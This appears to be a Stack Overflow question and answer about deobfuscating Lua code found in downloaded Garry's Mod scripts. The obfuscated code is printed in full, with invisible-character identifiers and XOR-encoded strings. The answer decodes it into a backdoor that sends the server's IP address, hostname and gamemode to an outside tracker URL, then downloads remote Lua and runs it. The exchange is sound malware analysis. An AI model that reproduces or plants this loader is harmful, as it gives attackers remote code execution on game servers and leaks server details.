1

I recently downloaded some lua scripts and discovered this obfuscated code within. After a good many hours I failed to discover how to deobfuscate it and was looking for some help.

In terms of what I have tried already, I noticed the number's just convert to characters which reveals a few functions. However it would appear that the variables assigned at the top are not assigned to anything or maybe some special unicode character which is invisible in my editor (atom).

Here is the obfuscated code:

local ‪ = _G
local ‪‪ = ‪['\115\116\114\105\110\103']
local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114']
local function ‪‪‪‪‪‪‪(‪‪‪‪)
  if ‪‪['\108\101\110'](‪‪‪‪) == 0 then
    return ‪‪‪‪
  end
  local ‪‪‪‪‪ = ''
  for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪, '\46\46') do ‪‪‪‪‪
    = ‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_, 16), 53))
  end
  return ‪‪‪‪‪
end ‪
[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,
  function ()‪
    [‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'655a4641'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45', {[‪‪‪‪‪‪‪'56'] = ‪[‪‪‪‪‪‪‪'52585a51'][‪‪‪‪‪‪‪'72504172545850585a5150']()[‪‪‪‪‪‪‪'7b545850'], [‪‪‪‪‪‪‪'50'] = ‪[‪‪‪‪‪‪‪'52545850'][‪‪‪‪‪‪‪'7250417c6574515147504646'](), [‪‪‪‪‪‪‪'51'] = ‪[‪‪‪‪‪‪‪'7250417d5a46417b545850']()})
  end )
‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,
  function ()‪
    [‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'735041565d'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',
  function (‪‪return)
    ‪[‪‪‪‪‪‪‪'67405b6641475c5b52'](‪‪return)
  end, nil )
end )
Andrei Todorut
  • 4,260
  • 2
  • 17
  • 28
Cjinks
  • 33
  • 4
  • 2
    Change encoding in editor to pure ASCII. Turn on visibility of all characters. Replace function/variable names with something more readable. Global table is accessed several times. The first function is used to decode all those strings to actual keys when accessing `_G`. Analyze this function; decode all strings and you are pretty much good to go. – Aki Jul 10 '19 at 10:01
  • 1
    Just replace `U+202A` with some visible character (for example, `x`) in the whole text – Egor Skriptunoff Jul 10 '19 at 10:15

1 Answers1

2

Old Lua (and modern LuaJIT) allows using arbitrary non-ASCII bytes (above 0x7F) in identifiers.
Nice feature for obfuscation! :-)

timer.Simple(
   5,
   function ()
      http.Post(
         "https://chainlose.000webhostapp.com/svlog/tracker.php", 
         {
            c = gmod.GetGamemode().Name, 
            e = game.GetIPAddress(), 
            d = GetHostName()
         }
      )
   end 
)
timer.Simple(
   5,
   function ()
      http.Fetch(
         "https://chainlose.000webhostapp.com/gas.lua",
         function (str)
            RunString(str)
         end, 
         nil 
      )
   end 
)
Egor Skriptunoff
  • 906
  • 1
  • 8
  • 23